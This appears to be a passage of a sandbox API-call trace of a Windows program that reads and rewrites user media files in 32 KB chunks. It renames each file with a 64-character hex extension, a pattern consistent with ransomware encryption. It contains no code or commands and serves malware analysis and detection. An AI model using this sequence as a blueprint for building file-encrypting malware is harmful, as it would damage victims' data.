RtlInterlockedCompareExchange64 () returned 0x3 [0163.981] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0164.061] ReadFile (in: hFile=0x5b0, lpBuffer=0x74421a0, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesRead=0x0, 
lpOverlapped=0x7422068) returned 1 [0164.061] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0164.064] NtQueryObject (in: Handle=0x5b0, ObjectInformationClass=0x1, ObjectInformation=0x7422118, ObjectInformationLength=0x10004, ReturnLength=0x422f7cc | out: ObjectInformation=0x7422118, ReturnLength=0x422f7cc) returned 0x0 [0164.065] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\7 nypZ.flv", lpString2=".3ED4486FEAC278B63AEE46CB976C52F525DD338451E43638D2BC3563A6D0425B" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\7 nypZ.flv.3ED4486FEAC278B63AEE46CB976C52F525DD338451E43638D2BC3563A6D0425B") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\7 nypZ.flv.3ED4486FEAC278B63AEE46CB976C52F525DD338451E43638D2BC3563A6D0425B" [0164.065] GetProcessHeap () returned 0x270000 [0164.065] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x120) returned 0x4275ac0 [0164.065] NtSetInformationFile (FileHandle=0x5b0, IoStatusBlock=0x422f7bc, FileInformation=0x4275ac0, Length=0x120, FileInformationClass=0xa) returned 0x0 [0164.066] CloseHandle (hObject=0x5b0) returned 1 [0164.071] GetProcessHeap () returned 0x270000 [0164.073] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7422068 | out: hHeap=0x270000) returned 1 [0164.073] RtlInterlockedCompareExchange64 () returned 0x1 [0164.073] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0164.078] ReadFile (in: hFile=0x5b0, lpBuffer=0x74421a0, nNumberOfBytesToRead=0x8000, 
lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068) returned 1 [0164.078] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0164.080] NtQueryObject (in: Handle=0x5b0, ObjectInformationClass=0x1, ObjectInformation=0x7422118, ObjectInformationLength=0x10004, ReturnLength=0x422f7cc | out: ObjectInformation=0x7422118, ReturnLength=0x422f7cc) returned 0x0 [0164.081] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\ArGdil6.wav", lpString2=".E17CECC669CB9D9323D1A260E894AA4FD05E9C69C277B698F524D6A173D54301" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\ArGdil6.wav.E17CECC669CB9D9323D1A260E894AA4FD05E9C69C277B698F524D6A173D54301") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\ArGdil6.wav.E17CECC669CB9D9323D1A260E894AA4FD05E9C69C277B698F524D6A173D54301" [0164.082] GetProcessHeap () returned 0x270000 [0164.082] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x122) returned 0x425ccb8 [0164.082] NtSetInformationFile (FileHandle=0x5b0, IoStatusBlock=0x422f7bc, FileInformation=0x425ccb8, Length=0x122, FileInformationClass=0xa) returned 0x0 [0164.084] CloseHandle (hObject=0x5b0) returned 1 [0164.089] GetProcessHeap () returned 0x270000 [0164.090] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7422068 | out: hHeap=0x270000) returned 1 [0164.090] RtlInterlockedCompareExchange64 () returned 0x1 [0164.090] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) 
returned 1 [0164.095] ReadFile (in: hFile=0x5b0, lpBuffer=0x74421a0, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068) returned 1 [0164.095] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0164.096] WriteFile (in: hFile=0x5b0, lpBuffer=0x74421a0*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068) returned 1 [0164.097] RtlInterlockedCompareExchange64 () returned 0x0 [0164.097] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0164.114] WriteFile (in: hFile=0x5b0, lpBuffer=0x74421a0*, nNumberOfBytesToWrite=0xc00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068) returned 1 [0164.116] RtlInterlockedCompareExchange64 () returned 0x0 [0164.116] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0164.141] WriteFile (in: hFile=0x5b0, lpBuffer=0x74421a0*, nNumberOfBytesToWrite=0x7000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068) returned 1 [0164.143] RtlInterlockedCompareExchange64 () returned 0x0 [0164.143] 
GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0164.156] WriteFile (in: hFile=0x5b0, lpBuffer=0x74421a0*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068) returned 1 [0164.157] RtlInterlockedCompareExchange64 () returned 0x0 [0164.157] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0164.169] WriteFile (in: hFile=0x5b0, lpBuffer=0x74421a0*, nNumberOfBytesToWrite=0x6800, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068) returned 1 [0164.171] RtlInterlockedCompareExchange64 () returned 0x0 [0164.171] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0164.427] ReadFile (in: hFile=0x5b0, lpBuffer=0x746a2f8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x744a1c0 | out: lpBuffer=0x746a2f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x744a1c0) returned 1 [0164.428] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0164.428] NtQueryObject (in: Handle=0x594, 
ObjectInformationClass=0x1, ObjectInformation=0x7618258, ObjectInformationLength=0x10004, ReturnLength=0x422f7cc | out: ObjectInformation=0x7618258, ReturnLength=0x422f7cc) returned 0x0 [0164.429] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\QEcAKn3l.mp3", lpString2=".9725BF9F8710E31BEED5C0644E7282337D227915FCA8958095714CBBE3931816" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\QEcAKn3l.mp3.9725BF9F8710E31BEED5C0644E7282337D227915FCA8958095714CBBE3931816") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\QEcAKn3l.mp3.9725BF9F8710E31BEED5C0644E7282337D227915FCA8958095714CBBE3931816" [0164.430] GetProcessHeap () returned 0x270000 [0164.430] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x124) returned 0x425d060 [0164.430] NtSetInformationFile (FileHandle=0x594, IoStatusBlock=0x422f7bc, FileInformation=0x425d060, Length=0x124, FileInformationClass=0xa) returned 0x0 [0164.433] CloseHandle (hObject=0x594) returned 1 [0164.438] GetProcessHeap () returned 0x270000 [0164.439] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x76181a8 | out: hHeap=0x270000) returned 1 [0164.692] RtlInterlockedCompareExchange64 () returned 0x5 [0164.692] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0165.793] WriteFile (in: hFile=0x304, lpBuffer=0x74421a0*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068) returned 1 [0165.951] RtlInterlockedCompareExchange64 () returned 0x1 [0165.951] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, 
dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0165.954] NtQueryObject (in: Handle=0x5a4, ObjectInformationClass=0x1, ObjectInformation=0x76900b8, ObjectInformationLength=0x10004, ReturnLength=0x422f7cc | out: ObjectInformation=0x76900b8, ReturnLength=0x422f7cc) returned 0x0 [0165.956] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\0T2p_sFj5.mp3", lpString2=".413BA5FB2579D6B1090B2F7FDBA6DC633837CA44CB80216AAA79064AE7EA3C3E" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\0T2p_sFj5.mp3.413BA5FB2579D6B1090B2F7FDBA6DC633837CA44CB80216AAA79064AE7EA3C3E") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\0T2p_sFj5.mp3.413BA5FB2579D6B1090B2F7FDBA6DC633837CA44CB80216AAA79064AE7EA3C3E" [0165.956] GetProcessHeap () returned 0x270000 [0165.956] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x110) returned 0x358390 [0165.956] NtSetInformationFile (FileHandle=0x5a4, IoStatusBlock=0x422f7bc, FileInformation=0x358390, Length=0x110, FileInformationClass=0xa) returned 0x0 [0165.957] CloseHandle (hObject=0x5a4) returned 1 [0165.959] GetProcessHeap () returned 0x270000 [0165.960] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0165.967] RtlInterlockedCompareExchange64 () returned 0x3 [0165.967] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0165.967] NtQueryObject (in: Handle=0x5e4, ObjectInformationClass=0x1, ObjectInformation=0x73e00f8, ObjectInformationLength=0x10004, ReturnLength=0x422f7cc | out: ObjectInformation=0x73e00f8, ReturnLength=0x422f7cc) returned 0x0 [0165.968] lstrcatW (in: 
lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\ZTc_iLMq.mp4", lpString2=".0CA4A640051E542412051470AE0EED32476BFC7D32AE243C3DB2C37DE9C0C43A" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\ZTc_iLMq.mp4.0CA4A640051E542412051470AE0EED32476BFC7D32AE243C3DB2C37DE9C0C43A") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\ZTc_iLMq.mp4.0CA4A640051E542412051470AE0EED32476BFC7D32AE243C3DB2C37DE9C0C43A" [0165.968] GetProcessHeap () returned 0x270000 [0165.969] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x11e) returned 0x4276f90 [0165.969] NtSetInformationFile (FileHandle=0x5e4, IoStatusBlock=0x422f7bc, FileInformation=0x4276f90, Length=0x11e, FileInformationClass=0xa) returned 0x0 [0165.970] CloseHandle (hObject=0x5e4) returned 1 [0165.971] GetProcessHeap () returned 0x270000 [0165.973] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0165.974] RtlInterlockedCompareExchange64 () returned 0x2 [0165.974] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0167.690] ReadFile (in: hFile=0x5a4, lpBuffer=0x746a2f8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x744a1c0 | out: lpBuffer=0x746a2f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x744a1c0) returned 1 [0167.690] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0167.691] WriteFile (in: hFile=0x5a4, lpBuffer=0x746a2f8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x744a1c0 | out: 
lpBuffer=0x746a2f8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x744a1c0) returned 1 [0167.694] RtlInterlockedCompareExchange64 () returned 0x0 [0167.694] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0167.703] WriteFile (in: hFile=0x5a4, lpBuffer=0x746a2f8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x744a1c0 | out: lpBuffer=0x746a2f8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x744a1c0) returned 1 [0167.709] RtlInterlockedCompareExchange64 () returned 0x0 [0167.709] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0167.726] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x422f7cc | out: ObjectInformation=0x74c20b8, ReturnLength=0x422f7cc) returned 0x0 [0167.727] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\c2-KpQ.m4a", lpString2=".F8262F9B72D50A41AFE1DC29F0677312EB6884A5844D43F0FDF28195D008FD38" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\c2-KpQ.m4a.F8262F9B72D50A41AFE1DC29F0677312EB6884A5844D43F0FDF28195D008FD38") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\c2-KpQ.m4a.F8262F9B72D50A41AFE1DC29F0677312EB6884A5844D43F0FDF28195D008FD38" [0167.727] GetProcessHeap () returned 0x270000 [0167.727] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x106) returned 0x4267828 [0167.727] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x422f7bc, FileInformation=0x4267828, Length=0x106, FileInformationClass=0xa) returned 0x0 
[0167.729] CloseHandle (hObject=0x5ac) returned 1 [0167.730] GetProcessHeap () returned 0x270000 [0167.731] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0167.731] RtlInterlockedCompareExchange64 () returned 0x1 [0167.731] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0167.735] ReadFile (in: hFile=0x5ac, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x7e00, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0167.735] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0167.737] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x422f7cc | out: ObjectInformation=0x74c20b8, ReturnLength=0x422f7cc) returned 0x0 [0167.738] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\d0i80.mp3", lpString2=".81A6318977E786A7F07257070140C285F4EAF5063C6F6A940A4CEE8C671CBF5C" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\d0i80.mp3.81A6318977E786A7F07257070140C285F4EAF5063C6F6A940A4CEE8C671CBF5C") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\d0i80.mp3.81A6318977E786A7F07257070140C285F4EAF5063C6F6A940A4CEE8C671CBF5C" [0167.738] GetProcessHeap () returned 0x270000 [0167.738] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x104) returned 0x4267940 [0167.738] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x422f7bc, FileInformation=0x4267940, 
Length=0x104, FileInformationClass=0xa) returned 0x0 [0167.740] CloseHandle (hObject=0x5ac) returned 1 [0167.741] GetProcessHeap () returned 0x270000 [0167.743] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0167.743] RtlInterlockedCompareExchange64 () returned 0x1 [0167.743] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0167.747] ReadFile (in: hFile=0x5ac, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x5c00, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0167.747] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0167.749] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x422f7cc | out: ObjectInformation=0x74c20b8, ReturnLength=0x422f7cc) returned 0x0 [0167.750] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\EDgkOwoCzVQ1piLO.wav", lpString2=".BF102A9CA644CCDEF82A950B1B3DA92071C3D4A1004DF9D90C2C1E8AD4822826" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\EDgkOwoCzVQ1piLO.wav.BF102A9CA644CCDEF82A950B1B3DA92071C3D4A1004DF9D90C2C1E8AD4822826") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\EDgkOwoCzVQ1piLO.wav.BF102A9CA644CCDEF82A950B1B3DA92071C3D4A1004DF9D90C2C1E8AD4822826" [0167.750] GetProcessHeap () returned 0x270000 [0167.750] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x11a) returned 0x42f98b0 [0167.750] 
NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x422f7bc, FileInformation=0x42f98b0, Length=0x11a, FileInformationClass=0xa) returned 0x0 [0167.751] CloseHandle (hObject=0x5ac) returned 1 [0167.752] GetProcessHeap () returned 0x270000 [0167.753] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0167.753] RtlInterlockedCompareExchange64 () returned 0x1 [0167.754] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0167.757] ReadFile (in: hFile=0x5ac, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0167.757] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0167.759] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x422f7cc | out: ObjectInformation=0x74c20b8, ReturnLength=0x422f7cc) returned 0x0 [0167.760] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\HVm1M33x_lC.wav", lpString2=".609D2DAA524E5B55D198F8A5096BAAD78B0CE89B07CF1E2C1704C307851AAE23" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\HVm1M33x_lC.wav.609D2DAA524E5B55D198F8A5096BAAD78B0CE89B07CF1E2C1704C307851AAE23") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\HVm1M33x_lC.wav.609D2DAA524E5B55D198F8A5096BAAD78B0CE89B07CF1E2C1704C307851AAE23" [0167.760] GetProcessHeap () returned 0x270000 [0167.760] RtlAllocateHeap 
(HeapHandle=0x270000, Flags=0x8, Size=0x110) returned 0x4267a58 [0167.760] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x422f7bc, FileInformation=0x4267a58, Length=0x110, FileInformationClass=0xa) returned 0x0 [0167.762] CloseHandle (hObject=0x5ac) returned 1 [0167.763] GetProcessHeap () returned 0x270000 [0167.764] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0167.764] RtlInterlockedCompareExchange64 () returned 0x1 [0167.764] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0167.767] ReadFile (in: hFile=0x5ac, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0167.767] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0167.769] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x422f7cc | out: ObjectInformation=0x74c20b8, ReturnLength=0x422f7cc) returned 0x0 [0167.770] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\PpOtp7J97-dM4YBP.wav", lpString2=".E5C9C33FF450FF2F4DF82A3CF675319DAE9E7B4BD59826B4ABF5DC716B39C757" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\PpOtp7J97-dM4YBP.wav.E5C9C33FF450FF2F4DF82A3CF675319DAE9E7B4BD59826B4ABF5DC716B39C757") 
returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\PpOtp7J97-dM4YBP.wav.E5C9C33FF450FF2F4DF82A3CF675319DAE9E7B4BD59826B4ABF5DC716B39C757" [0167.770] GetProcessHeap () returned 0x270000 [0167.770] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x11a) returned 0x42f99d8 [0167.771] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x422f7bc, FileInformation=0x42f99d8, Length=0x11a, FileInformationClass=0xa) returned 0x0 [0167.776] CloseHandle (hObject=0x5ac) returned 1 [0167.777] GetProcessHeap () returned 0x270000 [0167.779] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0167.779] RtlInterlockedCompareExchange64 () returned 0x1 [0167.779] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, 